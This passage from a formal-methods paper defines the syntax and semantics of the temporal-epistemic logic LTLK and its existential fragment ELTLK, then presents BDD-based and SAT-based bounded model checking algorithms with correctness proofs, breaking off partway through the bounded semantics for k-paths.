\(\mathrm{U}\) and \(\mathrm{R}\) are named as usual until and release, respectively, \(\mathrm{X}\) is the next step modality. The derived basic temporal modalities are defined as follows: \(\mathrm{F}\varphi {\stackrel{def}{=}} {{true}}\mathrm{U}\varphi \) and \(\mathrm{G}\varphi {\stackrel{def}{=}} {false}\mathrm{R}\varphi \). The epistemic operator \(K_{{ c}}\varphi \) represents “agent \({{ c}}\) knows \(\varphi \)” while the operator \({\overline{\mathrm{{K}}}}_{{ c}} \varphi \) is the corresponding dual one representing “agent \({{ c}}\) considers \(\varphi \) possible”. The epistemic operators \(\mathrm{{D}}_\varGamma , \mathrm{E}_\varGamma ,\) and \(\mathrm{{C}}_\varGamma \) represent distributed knowledge in the group \(\varGamma \), “everyone in \(\varGamma \) knows”, and common knowledge among agents in \(\varGamma \), respectively. The epistemic operator \({\overline{\mathrm{{D}}}}_\varGamma ,{\overline{\mathrm{E}}}_\varGamma ,\) and \({\overline{\mathrm{{C}}}}_\varGamma \) are the corresponding dual ones. Note that LTL is the sublogic of LTLK which consists only of the formulae built without the epistemic operators, i.e., LTL formulae are defined by the following grammar: $$\begin{aligned} \varphi :{:=} {{true}}\mid {false}\mid p \mid \lnot p \mid \varphi \wedge \varphi \mid \varphi \vee \varphi \mid \mathrm{X}\varphi \mid \varphi \mathrm{U}\varphi \mid \varphi \mathrm{R}\varphi . \end{aligned}$$ ELTLKis the existential fragment of LTLK, defined by the following grammar: $$\begin{aligned} \varphi :\!{:=} {{true}}\mid {false}\mid p \mid \lnot p \mid \varphi \wedge \varphi \mid \varphi \vee \varphi \mid \mathrm{X}\varphi \mid \varphi \mathrm{U}\varphi \mid \varphi \mathrm{R}\varphi \mid {\overline{\mathrm{{K}}}}_{{ c}}\varphi \mid {\overline{\mathrm{E}}}_{\varGamma }\varphi \mid {\overline{\mathrm{{D}}}}_{\varGamma }\varphi \mid {\overline{\mathrm{{C}}}}_{\varGamma }\varphi . \end{aligned}$$ Observe that we assume that the LTLK (and so LTL and ELTLK) formulae are given in the negation normal form (NNF), in which the negation can be only applied to propositional variables. 2.5.2 Semantics Let \(M=(G,\iota , T, \{\sim _{{ c}}\}_{{{ c}} \in \mathcal{A }}, \mathcal{V })\) be a model, and \(\rho \) be a path or run. By \(\rho (i)\) we denote the \(i\)-th state of \(\rho \), and by \(\rho [m]\) we denote the path or run \(\rho \) with a designated formula evaluation position \(m\), where \(m \unlhd _\rho length(\rho )\). Further, let \(\varGamma \subseteq \mathcal{A }\). We use the following standard relations to give semantics to the “everyone knows”, “common knowledge”, and “distributed knowledge” modalities: \(\sim ^E_\varGamma = \bigcup _{{{ c}} \in \varGamma }\sim _{{ c}},\,\sim ^C_\varGamma \) is the transitive closure of \(\sim ^E_\varGamma \), whereas \(\sim ^D_\varGamma = \bigcap _{{{ c}} \in \varGamma }\sim _{{ c}}\). We say that an LTLK formula \(\varphi \) is true along \(\rho \) (in symbols \(M,\rho \models \varphi \)) iff \(M, \rho [0] \models \varphi \), where $$\begin{aligned} \begin{array}{l@{\quad }l} M, \rho [m] \models {{true}}&{} \\ M, \rho [m] \not \models {false}&{} \\ M, \rho [m] \models p \text { iff }&{} p \in {\mathcal{V }}(\rho (m)) \\ M, \rho [m] \models \lnot p \text { iff }&{} p \not \in {\mathcal{V }}(\rho (m)) \\ M, \rho [m] \models \varphi \wedge \psi \text { iff }&{} M, \rho [m] \models \varphi \text { and } M, \rho [m] \models \psi \\ M, \rho [m] \models \varphi \vee \psi \text { iff }&{} M, \rho [m] \models \varphi \text { or } M, \rho [m] \models \psi \\ M, \rho [m] \models \mathrm{X}\varphi \text { iff }&{} length(\rho ) > m \text { and } M, \rho [m+1] \models \varphi \\ M, \rho [m] \models \varphi \mathrm{U}\psi \text { iff }&{} (\exists k\ge m)(M, \rho [k]\models \psi \text { and } (\forall m \le j < k)M, \rho [j]\models \varphi ) \\ M, \rho [m] \models \varphi \mathrm{R}\psi \text { iff }&{} (\rho \in \varPi ^\omega (\iota ) \text { and } (\forall k\ge m) M, \rho [k]\models \psi ) \text { or }\\ &{} (\exists k\ge m) (M, \rho [k]\models \varphi \text { and } (\forall m \le j \le k) M, \rho [j]\models \psi ) \\ M, \rho [m] \models \mathrm{{K}}_{ c}\varphi \text { iff }&{} (\forall \rho ' \in \varPi ^\omega (\iota )) (\forall k{\,\geqslant \,}0)( \rho '(k) \sim _{ c}\rho (m) \text { implies } M,\rho '[k] \models \varphi ) \\ M, \rho [m] \models {\overline{\mathrm{{K}}}}_{ c}\varphi \text { iff }&{} (\exists \rho ' \in \varPi (\iota ))(\exists k{\,\geqslant \,}0)(\rho '(k) \sim _{ c}\rho (m) \text { and } M,\rho '[k] \models \varphi ) \\ M, \rho [m] \models \mathrm{Y}_\varGamma \varphi \text { iff }&{} (\forall \rho ' \in \varPi ^\omega (\iota )) (\forall k{\,\geqslant \,}0)( \rho '(k) \sim ^\mathrm{Y}_\varGamma \rho (m) \text { implies } M,\rho '[k] \models \varphi ) \\ M, \rho [m] \models \overline{\mathrm{Y}}_\varGamma \varphi \text { iff }&{} (\exists \rho ' \in \varPi (\iota ))(\exists k{\,\geqslant \,}0)(\rho '(k) \sim ^\mathrm{Y}_\varGamma \rho (m) \text { and } M,\rho '[k] \models \varphi ) , \\ &{}\text { where } \mathrm{Y}\in \{ \mathrm{{D}},\mathrm{E},\mathrm{{C}}\}.\\ \end{array} \end{aligned}$$ Let \(g\) be a global state of \(M\) and \(\varphi \) an LTLK formula. We assume the following notations: • \(M,g \models \varphi \) iff \(M,\rho \models \varphi \) for all the runs \(\rho \in \varPi ^\omega (g)\). • \(M \models \varphi \) iff \(M,\iota \models \varphi \). • \(M,g \models ^\exists \varphi \) iff \(M,\rho \models \varphi \) for some path or run \(\rho \in \varPi (g)\). • \(Props(\varphi )\) is the set of the propositional variables appearing in \(\varphi \). Let \(m\) be a formula evaluation position, and \(p,q \in \mathcal{PV }\). An illustration of the semantics is shown in Figs. 4, 5, 6. Fig. 4 Evaluation of formulae of types: Next state and Until Fig. 5 Evaluation of formulae of the Relase type Fig. 6 Evaluation of existential epistemic formulae. The highlighted states are epistemically equivalent Given the above, we say that: • the LTLK formula \(\varphi \) holds in the model \(M\) (written \(M \models \varphi \)) iff \(M,\rho \models \varphi \) for all runs \(\rho \in \varPi ^\omega (\iota )\). • the ELTLK formula \(\varphi \) holds in the model \(M\) (written \(M \models ^{\exists } \varphi \)) iff \(M,\rho \models \varphi \) for some path or run \(\rho \in \varPi (\iota )\). Determining whether an LTLK formula \(\varphi \) is existentially (resp. universally) valid in a model \(M\) is called an existential (resp. universal) model checking problem. In other words, the universal model checking problem asks whether \(M \models \varphi \) and the existential model checking problem asks whether \(M \models ^{\exists } \varphi \). In order to solve the universal model checking problem, one can negate the formula and show that the existential model checking problem for the negated formula has no solution. Intuitively, we are trying to find a counterexample, and if we do not succeed, then the formula is universally valid. Now, since bounded model checking is designed for finding a solution to an existential model checking problem, in the paper we only consider the properties expressible in ELTLK. This is because finding a counterexample, for example, to \(M\models \mathrm{G}\mathrm{{K}}_{{ c}} p\) corresponds to the question whether there exists a witness to \(M\models ^\exists \mathrm{F}{\overline{\mathrm{{K}}}}_{{ c}}\lnot p\). Our semantics meets two important properties. Firstly, for LTLK the definition of validity in a model \(M\) uses runs only. Secondly, if we replace each \(\varPi \) with \(\varPi ^\omega \), the semantics does not change as our models have total transition relations (each path is a prefix of some run). The semantics applied to submodels of \(M\) does not have the above property, but it preserves ELTLK over \(M\), which is shown in Lemma 1. Moreover, note that in the above semantics while we define the until operator, \(\rho \) could be an arbitrary path or run (i.e., \(\rho \in \varPi \)). However, while we define the release operator, we insist on \(\rho \) to be a run that starts in the initial state on the part of the definition that corresponds to the globally operator. 2.6 Comments on IS and IIS There are variety of models of multi-agent systems. A fundamental dimension along which this models differ is the degree to which the activity of agents is synchronised. At one end of the spectrum is the synchronous model in which acting of agents proceeds in a sequence of rounds. In each round, an agent performs an action that affects the other agents, is affected by actions executed by the other agents in that round, and changes his/her state. All agents perform actions at exactly the same time. At the other end is the asynchronous model in which there is no bound on the amount of time that can elapse between agents’ actions, and there is no bound on the time it can take for an agent to act. Between these extremes there are the semi-synchronous models in which times of agents’ actions can vary, but are bounded between constant upper and lower bounds. Now, observe that the agents over the interpreted systems semantics perform a joint action at a given time in a global state, which means that we assume the synchronous semantics of interpreted systems. Next, in the interleaved interpreted systems only one local or shared action may be performed by agents at a given time in a global state. This means that the interleaved interpreted systems define the asynchronous semantics. Systems can be modelled using both IIS and IS. The idea is not to convert an IS into IIS, but rather using both the representations, which are independently defined starting from a description of a system. However, for many systems an IIS model is a submodel of the corresponding IS model, (i.e., the set of states of the IIS model is a subset of the set of states of the corresponding IS model and the transition relation of an IIS model is a subset of the transition relation of the corresponding IS model), and then we can discuss the complexity of converting an IS encoding into an IIS one. In such a case, from the definitions of IS and IIS it follows that each computation of the Kripke model generated by IIS is also a valid computation of the Kripke model generated by IS. Thus, if an ELTLK formula is valid in the model generated by IIS, then this formula is also valid in the model generated by IS. However, the converse of the implication does not hold. Further, if we have a propositional formula \(\varphi \) that encodes the transition relation of the Kripke model generated by an IS such that the null action is enabled at each local state, then we can convert it to the formula \(\varphi \wedge \varphi '\) that encodes the transition relation of the Kripke model generated by IIS and the length of \(\varphi '\) is \(O(n\cdot log(n))\), where \(n\) is the number of the agents. The formula \(\varphi '\) forces the agents to work in an asynchronous way. 3 Bounded model checking The main idea of SAT-based BMC methods consists in translating the existential model checking problem [12, 48] for a modal (e.g., temporal, epistemic, deontic) logic to the propositional satisfiability problem, i.e., it consists in representing a counterexample-trace of bounded length by a propositional formula and checking the resulting propositional formula with a specialised SAT-solver. If the formula in question is satisfiable, then a satisfying assignment returned by the SAT-solver can be converted into a concrete counterexample that shows that the property is violated. Otherwise, the bound is increased and the process repeated. Let \(M\) be a model for a system \(S,\,\varphi \) an existential formula describing a property \(P\) to be tested, and \(k \in \mathrm{I\!N}\) a bound. Moreover, let \(tr_k(\varphi )\) be a propositional formula that is satisfiable if and only if the formula \(\varphi \) holds in the model \(M\). Algorithm 1 shows the general SAT-based BMC approach. In Algorithm 1 we use the procedure \(checkSat(\gamma )\) that for any given propositional formula \(\gamma \) returns one of the three possible values: \(\mathsf SAT ,\,\mathsf UNSAT \), or \(\mathsf UNKNOWN \). The meanings of the values \(\mathsf SAT \) and \(\mathsf UNSAT \) are self-evident. The value \(\mathsf UNKNOWN \) is returned either if the procedure \(checkSat\) is not able to decide the satisfiability of its argument within some preset timeout period or has to terminate itself due to exhaustion of the memory available. The crux of BDD-based BMC is to interleave the verification with the construction of the reachable states. Algorithm 2 illustrates a general idea of the BDD-based bounded model checking method. With \(\mathcal{M }_0\) we denote the submodel that consists of the initial state of \(M\) only, and \({\mathcal{M }}_{\leadsto }\) denotes the model that extends the model \(\mathcal{M }\) with all the immediate successors of the states of \(\mathcal M \). At each step of the state space construction we obtain a submodel (denoted with \(\mathcal M \)) of the analysed model \(M\), which is used to verify (line 4) the existential formula. These steps are applied repetitively until the fixed point for the state space construction is reached, i.e., \(\mathcal{M } = \mathcal{M }'\), or a witness for the verified formula is found. The number of iterations needed for the algorithm to complete is counted using the variable \(k\), which is later used in the evaluation of the approach. 3.1 BDD-based Approach In this section we show how to perform bounded model checking for ELTLK using BDDs [12] by combining the standard approach for ELTL [11] with the method for the epistemic operators [43] similarly to the solution for \(\mathrm{CTL}^{*}\) of [12]. Definition 1 Let \(\mathcal{PV }\) be a set of propositions. For an ELTLK formula \(\varphi \) we define inductively the number\(\gamma {(\varphi )}\)of nested epistemic operators in the formula: • if \(\varphi = p\), where \(p \in \mathcal{PV }\), then \(\gamma {(\varphi )} = 0\), • if \(\varphi = \odot \varphi '\) and \(\odot \in \{ \lnot , \mathrm{X}\}\), then \(\gamma {(\varphi )} = \gamma {(\varphi ')}\), • if \(\varphi = \varphi ' \odot \varphi ''\) and \(\odot \in \{ \wedge , \vee , \mathrm{U}, \mathrm{R}\}\), then \(\gamma {(\varphi )} = \gamma {(\varphi ')} + \gamma {(\varphi '')}\), • if \(\varphi = \mathrm{Y}\varphi '\) and \(\mathrm{Y}\in \{ {\overline{\mathrm{{K}}}}_{ c}, {\overline{\mathrm{E}}}_\varGamma , {\overline{\mathrm{{D}}}}_\varGamma , {\overline{\mathrm{{C}}}}_\varGamma \}\), then \(\gamma {(\varphi )} = \gamma {(\varphi ')} + 1\). Definition 2 Let \(\mathrm{Y}\in \{ {\overline{\mathrm{{K}}}}_{ c}, {\overline{\mathrm{E}}}_\varGamma , {\overline{\mathrm{{D}}}}_\varGamma , {\overline{\mathrm{{C}}}}_\varGamma \}\). If \(\varphi = \mathrm{Y}\psi \) is an ELTLK formula, by \(sub(\varphi )\) we denote the immediate subformula \(\psi \) of the epistemic operator \(\mathrm{Y}\). Moreover, for an arbitrary ELTLK formula \(\varphi \) we define inductively the set \({\mathcal{Y }}(\varphi )\) of its subformulae in the form \(\mathrm{Y}\psi \): • if \(\varphi = p\), where \(p \in \mathcal{PV }\), then \({\mathcal{Y }}(\varphi ) = \emptyset \), • if \(\varphi = \odot \varphi '\) and \(\odot \in \{ \lnot , \mathrm{X}\}\), then \({\mathcal{Y }}(\varphi ) = {\mathcal{Y }}(\varphi ')\), • if \(\varphi = \varphi ' \odot \varphi ''\) and \(\odot \in \{ \wedge , \vee , \mathrm{U}, \mathrm{R}\}\), then \({\mathcal{Y }}(\varphi ) = {\mathcal{Y }}(\varphi ') \cup {\mathcal{Y }}(\varphi '')\), • if \(\varphi = \mathrm{Y}\varphi '\) and \(\mathrm{Y}\in \{ {\overline{\mathrm{{K}}}}_{ c}, {\overline{\mathrm{E}}}_\varGamma , {\overline{\mathrm{{D}}}}_\varGamma , {\overline{\mathrm{{C}}}}_\varGamma \}\), then \({\mathcal{Y }}(\varphi ) = {\mathcal{Y }}(\varphi ') \cup \{\varphi \}\). Definition 3 Let \(M= (G, \iota , T, \{\sim _{ c}\}_{{ c}\in \mathcal{A }}, \mathcal{V })\) and \(U\subseteq G\) with \(\iota \in U\). The submodel generated by \(U\) is a tuple \(M{|_U} = (U, \iota , T', \{\sim '_{ c}\}_{{ c}\in \mathcal{A }}, \mathcal{V }')\), where: \(T' = T \cap U^2,\,\sim _{ c}' =\ \sim _{ c}\cap ~U^2\) for each \({ c}\in \mathcal{A }\), and \(\mathcal{V }' = {\mathcal{V }} \cap U^2\). For ELTLKformulae \(\varphi , \psi \), and \(\psi '\), by \(\varphi {[\psi \leftarrow \psi ']}\) we denote the formula \(\varphi \) in which every occurrence of \(\psi \) is replaced with \(\psi '\). Let \(M= (G, \iota , T, \{\sim _{ c}\}_{{ c}\in \mathcal{A }}, \mathcal{V })\) be a model, then by \({\mathcal{V }}_M\) we understand the valuation function \(\mathcal{V }\) of the model \(M\), and by \(G_R \subseteq G\) the set of its reachable states. Moreover, we define [\([\!\![{M,\varphi }]\!\!]] = \{ g\in G_R \mid M,g\models ^\exists \varphi \}\). 3.1.1 Reduction of ELTLK to ELTL Let \(M= (G, \iota , T, \{\sim _{ c}\}_{{ c}\in \mathcal{A }}, \mathcal{V })\) be a model, and \(\varphi \) an ELTLK formula. Here, we describe an algorithm for computing the set [\([\!\![{M,\varphi }]\!\!]\)]. The algorithm allows for combining any two methods for computing [\([\!\![{M,\varphi }]\!\!]\)] for each \(\varphi \) being an ELTL formula, or in the form \(\mathrm{Y}\!p\), where \(p \in \mathcal{PV }\), and \(\mathrm{Y}\in \{ {\overline{\mathrm{{K}}}}_{ c}, {\overline{\mathrm{E}}}_\varGamma , {\overline{\mathrm{{D}}}}_\varGamma , {\overline{\mathrm{{C}}}}_\varGamma \}\) (we use the algorithms from [11] and [43], respectively). Algorithm 3 is used to compute the set \([[\!\![{M,\varphi }]\!\!]]\). In order to obtain this set, we construct a new model \(M'\) together with an ELTL formula \(\varphi '\), as described in Algorithm 3, and compute the set \([[\!\![{M', \varphi '}]\!\!]]\), which is equal to \([[\!\![{M,\varphi }]\!\!]]\). Initially \(\varphi '\) equals \(\varphi \), which is an ELTLK formula, and we process the formula in stages to reduce it to an ELTL formula by replacing with atomic propositions all its subformulae containing epistemic operators. We begin by choosing some epistemic subformula \(\psi \) of \(\varphi '\), which consists of exactly one epistemic operator, and process it in two stages. First, we modify the valuation function of \(M'\) such that every state initialising some path or run along which \(sub(\psi )\) holds is labelled with the new atomic proposition \(p_{sub(\psi )}\), and we replace with the variable \(p_{sub(\psi )}\) every occurrence of \(sub(\psi )\) in \(\psi \). In the second stage, we deal with the epistemic operators having in their scopes atomic propositions only. By modifying the valuation function of \(M'\) we label every state initialising some path or run along which the modified simple epistemic formula \(\psi \) holds with a new variable \(p_{\psi }\). Similarly to the previous stage, we replace every occurrence of \(\psi \) in \(\varphi '\) with \(p_{\psi }\). In the subsequent iterations, we process every remaining epistemic subformulae of \(\varphi '\) in the same way until there are no more nested epistemic operators in \(\varphi '\), i.e., we obtain an ELTL formula \(\varphi '\), and the model \(M'\) with the appropriately modified valuation function. Finally, we compute the set of all reachable states of \(M'\) that initialise at least one path or run along which \(\varphi '\) holds (line 13). The correctness of the substitution used in Algorithm 3 is stated in the following lemma: Lemma 1 Let \(M= (G, \iota , T, \{\sim _{ c}\}_{{ c}\in \mathcal{A }}, \mathcal{V })\) be a model over \(\mathcal{PV },\,\varphi \) an ELTLK formula, and \(g\in G\) some state of \(M\). We define \(M' = (G, \iota , T, \{\sim _{ c}\}_{{ c}\in \mathcal{A }}, \mathcal{V }')\) over \({\mathcal{PV }}' = {\mathcal{PV }} \cup \{ q \}\), where \(q\) is an atomic proposition such that \(q\not \in \mathcal{PV }\), and \(\mathcal{V }'\) is defined as follows: • \(p \in {\mathcal{V }}(g')\) iff \(p \in {\mathcal{V }}'(g')\) for all \(p\in \mathcal{PV }\) and \(g'\in G\), • \(M,g'\models ^\exists \varphi \) iff \(q\in {\mathcal{V }}'(g')\) for all \(g'\in G\). Then, \(M',g\models ^\exists q\) iff \(M,g\models ^\exists \varphi \). Proof (Sketch) The “\(\Rightarrow \)” case follows directly from the definition of \(V'\). The “\(\Leftarrow \)” case can be demonstrated by the induction on the length of a formula \(\varphi \). The base case follows directly for the atomic propositions and their negations. In the inductive step we assume that the lemma holds for all the proper subformulae of \(\varphi \), and use the definition of \(V'\), and the fact that \(M'\) contains exactly the same paths as \(M\). 3.1.2 BMC Algorithm To perform bounded model checking of an ELTLK formula, we use Algorithm 4. Given a model \(M\) and an ELTLK formula \(\varphi \), the algorithm checks if there exists a path or run initialised in \(\iota \) on which \(\varphi \) holds, i.e., if \(M,\iota \models ^\exists \varphi \). For any \(X~\subseteq G\) by \({X}_{\leadsto } \stackrel{def}{=}\{ g' \in G\mid (\exists {g\in X}) (\exists {\rho \in \varPi (g)}) ~g' = \rho (1) \}\) we mean the set of the immediate successors of all the states in \(X\). The algorithm starts with the set \({Reach}\) of reachable states that initially contains only the state \(\iota \). With each iteration the verified formula is checked (line 4), and the set \({Reach}\) is extended with new states (line 8). The algorithm operates on submodels \(M|_{{Reach}}\) generated by the set \({Reach}\) to check if the initial state \(\iota \) is in the set of states from which there is a path or run on which \(\varphi \) holds. The loop terminates if there is such a path or run in the obtained submodel, and the algorithm returns \(\mathsf TRUE \) (line 4). The search continues until no new states can be reached from the states in \({Reach}\). When we obtain the set of reachable states, and a path or run from the initial state on which \(\varphi \) holds could not be found in any of the obtained submodels, the algorithm terminates with \(\mathsf FALSE \). The correctness of the results obtained by the bounded model checking algorithm is formulated by the following theorem: Theorem 1 Let \(M= (G, \iota , T, \{\sim _{ c}\}_{{ c}\in \mathcal{A }}, \mathcal{V })\) be a model, \(\varPi \) a set of paths and runs of \(M,\,\varphi \) an ELTLK formula, and \(\rho \in \varPi \) a path or run with an evaluation position \(m\) such that \(m \unlhd _\rho length(\rho )\). Then, \(M,\rho [m] \models \varphi \) iff there exists \(G' \subseteq G\) such that \(\iota \in G'\), and \(M{|_{G'}},\rho [m] \models \varphi \). Proof \(\Rightarrow \)” This way the proof is obvious as we simply take \(G' = G\). \(\Leftarrow \)” This way the proof is more involved. It is by induction on the length of a formula \(\varphi \). The base case is straightforward as the lemma follows directly for the propositional variables and their negations. Assume, the statement holds for all the proper subformulae of \(\varphi \). Let \(G' \subseteq G\) be a set of states such that \(M{|_{G'}}\) contains \(\rho \), and (*) let \(m \in \mathrm{I\!N}\) be an evaluation position such that \(M{|_{G'}}, \rho [m] \models \varphi \). 1. 1. Let \(\varphi = \psi _1 \vee \psi _2\). By the semantics and the assumption (*), \(M{|_{G'}},\rho [m] \models \psi _1\) or \(M{|_{G'}},\rho [m] \models \psi _2\). Using the induction hypothesis and the definition of submodel (Definition 3), \(\rho \) exists also in the model \(M\), and \(M,\rho [m] \models \psi _1\) or \(M,\rho [m]\models \psi _2\), thus \(M,\rho [m] \models \psi _1 \vee \psi _2\).   2. 2. Let \(\varphi = \psi _1 \wedge \psi _2\). By the semantics and the assumption (*), \(M{|_{G'}},\rho [m] \models \psi _1\) and \(M{|_{G'}},\rho [m] \models \psi _2\). Using the induction hypothesis and the definition of submodel, \(\rho \) exists also in the model \(M\). Therefore, \(M,\rho [m] \models \psi _1\) and \(M,\rho [m]\models \psi _2\), thus \(M,\rho [m] \models \psi _1 \wedge \psi _2\).   3. 3. Let \(\varphi = \mathrm{X}\psi _1\). By the semantics and the assumption (*), \(length(\rho ) > m\), and \(M{|_{G'}},\rho [m+1] \models \psi _1\). Using the induction hypothesis and the definition of submodel, we get that \(\rho \) exists also in \(M\), and \(M,\rho [m+1] \models \psi _1\), therefore \(M, \rho [m] \models \mathrm{X}\psi _1\).   4. 4. Let \(\varphi = \psi _1 \mathrm{U}\psi _2\). By the semantics and the assumption (*), there exists \(k {\,\geqslant \,}m\), such that \(M{|_{G'}},\rho [k] \models \psi _2\), and \(M{|_{G'}},\rho [j] \models \psi _1\), for all \(m {\,\leqslant \,}j < k\). Using the induction hypothesis and the definition of submodel, we get that \(\rho \) exists also in \(M\). Therefore, from \(M, \rho [k] \models \psi _2\), and \(M, \rho [j] \models \psi _1\) for all \(m {\,\leqslant \,}j < k\), it follows that \(M,\rho [m] \models \psi _1 \mathrm{U}\psi _2\).   5. 5. Let \(\varphi = \psi _1 \mathrm{R}\psi _2\). By the semantics and the assumption (*) we have one or both of the following cases: 1. (a) \(\rho \) is a path of \(M{|_{G'}}\), and \(M{|_{G'}}, \rho [k] \models \psi _2\) for all \(k {\,\geqslant \,}m\), then from the definition of submodel, \(\rho \) exists also in \(M\), and \(\rho \in \varPi ^\omega \). Using the induction hypothesis, we have that \(M, \rho [k] \models \psi _2\) for all \(k {\,\geqslant \,}m\). Therefore, it follows that \(M, \rho [m] \models \psi _1 \mathrm{R}\psi _2\).   2. (b) There exists \(k {\,\geqslant \,}m\) such that \(M{|_{G'}}, \rho [k] \models \psi _1\), and \(M{|_{G'}},\rho [j] \models \psi _2\) for all \(m {\,\leqslant \,}j {\,\leqslant \,}k\). From the definition of submodel, \(\rho \) also exists in \(M\), and using the induction hypothesis we get that \(M, \rho [k] \models \psi _1\), and \(M, \rho [j] \models \psi _2\) for all \(m {\,\leqslant \,}j {\,\leqslant \,}k\). Thus, \(M,\rho [m] \models \psi _1 \mathrm{R}\psi _2\).     6. 6. Let \({ c}\in \mathcal{A }\) and \(\varphi = {\overline{\mathrm{{K}}}}_{ c}\psi _1\). By the semantics and the assumption (*), there exists such a path or run \(\rho '\) in \(M{|_{G'}}\) that \(\rho '(k) \sim _{ c}\rho (m)\) for some \(k {\,\geqslant \,}0\), and \(M{|_{G'}}, \rho '[k] \models \psi _1\). From the definition of submodel, \(\rho \) and \(\rho '\) also exist in \(M\). Using the induction hypothesis, we get that \(M, \rho '[k] \models \psi _1\) and \(\rho '(k) \sim _{ c}\rho (m)\). Thus, \(M, \rho [m] \models {\overline{\mathrm{{K}}}}_{ c}\psi _1\).   7. 7. Let \(\varGamma \subseteq \mathcal{A }\) and \(\varphi = \overline{\mathrm{Y}}_\varGamma \psi _1\), where \(\mathrm{Y}\in \{ \mathrm{{D}}, \mathrm{E}, \mathrm{{C}}\}\). By the semantics and the assumption (*), there exists such a path or run \(\rho '\) in \(M{|_{G'}}\) that \(\rho '(k) \sim _\varGamma ^\mathrm{Y}\rho (m)\) for some \(k {\,\geqslant \,}0\), and \(M{|_{G'}}, \rho '[k] \models \psi _1\). From the definition of submodel, \(\rho \) and \(\rho '\) also exist in \(M\). Using the induction hypothesis, we get that \(M, \rho '[k] \models \psi _1\) and \(\rho '(k) \sim _\varGamma ^\mathrm{Y}\rho (i)\). Thus, \(M, \rho [m] \models \overline{\mathrm{Y}}_\varGamma \psi _1\).   3.1.3 Model Checking ELTL In Algorithm 3, to compute the sets of states in which ELTL formulae hold, it is possible to use any method that computes the set \([[\!\![{M,\varphi }]\!\!]]\) for \(\varphi \) being an ELTL formula. The method described in [11] uses a tableau construction for which many improvements have been proposed, e.g., [15, 18, 19, 45], but for the purpose of implementing a complete solution for the BDD-based bounded model checking of ELTLK, we use the basic symbolic model checking method of [11]. This method is based on checking the non-emptiness of Büchi automata. Given a model \(M\) and an ELTL formula \(\varphi \), we begin with constructing the tableau for \(\varphi \) (as described in [11]), that is then combined with \(M\) to obtain their product, which contains these runs of \(M\) where \(\varphi \) potentially holds. Next, the product is verified in terms of the CTL model checking of \(\mathrm{E}\mathrm{G}{true}\) formula under fairness constraints. Those constraints, corresponding to sets of states, allow to choose only the runs of the model, along which at least one state in each set representing fairness constraints appears in a cycle. In case of ELTL model checking, fairness guarantees that \(\varphi \mathrm{U}\psi \) really holds, i.e., eliminates the runs where \(\varphi \) holds continuously, but \(\psi \) never holds. Finally, we choose only these reachable states of the product that belong to some particular set of states computed for the formula. The corresponding states of the verified system that are in this set, comprise the set \([[\!\![{M, \varphi }]\!\!]]\), i.e., the reachable states where the verified formula holds. For more details, we refer the reader to [11]. The method described above has some limitations when used for bounded model checking, where it is preferable to detect counterexamples using not only the runs but also the paths of the submodel. As totality of the transition relation of the verified model is assumed, counterexamples are found only along the runs of the model. However, the method remains correct even if the final submodel only has the total transition relation: in the worst case the detection of the counterexample is delayed to the last iteration, i.e., when all the reachable states are computed. Nonetheless, this should not keep us from assessing the potential efficiency of our approach. 3.1.4 Model checking epistemic modalities In the case of the formulae of the form \(\mathrm{Y}p\), where \(p \in \mathcal{PV }\), and \(\mathrm{Y}\in \{ {\overline{\mathrm{{K}}}}_{ c}, {\overline{\mathrm{E}}}_\varGamma , {\overline{\mathrm{{D}}}}_\varGamma , {\overline{\mathrm{{C}}}}_\varGamma \}\), for the implementation purposes we use the algorithms described in [43]. The procedures simply follow from the semantics of ELTLK. The algorithm for \({\overline{\mathrm{{C}}}}_\varGamma \) involves a fixpoint computation, whereas for the remaining operators the algorithms are based on simple non-iterative computations. 3.2 SAT-based Approach In this section we present two SAT-based BMC methods for ELTLK. The first one is defined for interleaved interpreted systems while the second one is defined for interpreted systems. The main difference between the two methods is in the propositional encoding of the transition relation of the model under consideration. In SAT-based BMC we construct a propositional formula that is satisfiable if and only if there exists a finite set of paths of the underlying model that is a solution to the existential model checking problem. In order to construct the propositional formula, first we need to define the bounded semantics for the underlying logic (i.e., in our case for ELTLK), then to encode the semantics by means of a propositional formula, and finally to represent a part of the model by a propositional formula. The bounded semantics and the encoding for ELTLK, which is presented in this section, is based on the semantics and encoding of [55] for the temporal fragment and on the semantics and encoding of [52] for the epistemic fragment of ELTLK. This bounded semantics differs from the bounded semantics for ELTLK defined in [42] in the definition of the \(k\)-path that allows to replace two separate bounded semantics for \(k\)-paths that are loops and for \(k\)-paths that do not need to be loops, with one bounded semantics that is simpler, more elegant, and results in a more efficient translation of the bounded model checking problem to the SAT problem. The propositional formula that encodes the bounded semantics for ELTLK is independent of the type of the considered model, i.e., the encoding is the same for both the interpreted systems and the interleaved interpreted systems. This encoding differs from the one defined in [42] in the definiion of the looping condition, and in using an appropriately chosen subsets of symbolic paths that are needed to encode subformulae of a formula in question. We start with presenting the definition of the bounded semantics for ELTLK and showing that the bounded and unbounded semantics are equivalent. Then, we show a translation of the existential model checking problem for ELTLK to the propositional satisfiability problem. Finally, we prove correctness and completeness of the translation to SAT. 3.2.1 Bounded semantics for ELTLK Let \(M =(G,\iota ,T,\{\sim _{{ c}}\}_{{{ c}} \in \mathcal{A }},\mathcal{V })\) be a model defined for either IIS or IS, and \(k \in \mathrm{I\!N}\) a bound. A \(k\)-path is a pair \((\rho , l)\), also denoted by \(\rho _l\), where \(0 {\,\leqslant \,}l {\,\leqslant \,}k\), and \(\rho \) is a finite sequence \( \rho = (g_{0}, \ldots , g_{k})\) of states such that \((g_{j}, g_{j+1}) \in T\) for each \(0{\,\leqslant \,}j < k \). A \(k\)-path \(\rho _l\) is a loop if \(l < k\) and \(\rho (k) = \rho (l)\). By \({\varPi _k}(g)\) we denote the set of all the \(k\)-paths \(\rho _l\) with \(\rho (0) = g\). If a \(k\)-path \(\rho _l\) is a loop, then it represents the run of the form \(uv^{\omega }\), where \(u=(\rho (0),\ldots ,\rho (l))\) and \(v=(\rho (l+1),\ldots ,\rho (k))\). We denote this unique run by \(\varrho (\rho _l)\). To illustrate the notion of \(k\)-paths and loops, let us consider the following model shown in Fig. 7. Observe that the pairs: \(\rho _0 = ((g_0, g_1, g_0, g_2, g_0), 0),\,\rho _1 = ((g_0, g_1, g_0, g_2, g_0), 1),\,\rho _2 = ((g_0, g_1, g_0, g_2, g_0), 2),\,\rho _3 = ((g_0, g_1, g_0, g_2, g_0), 3),\,\rho _4 = ((g_0, g_1, g_0, g_2, g_0), 4)\) are \(k\)-paths for \(k = 4\). Moreover, only \(\rho _0\) and \(\rho _2\) are loops. Observe also that the \(k\)-path \(\rho _2\) represents the following path: \((g_0, 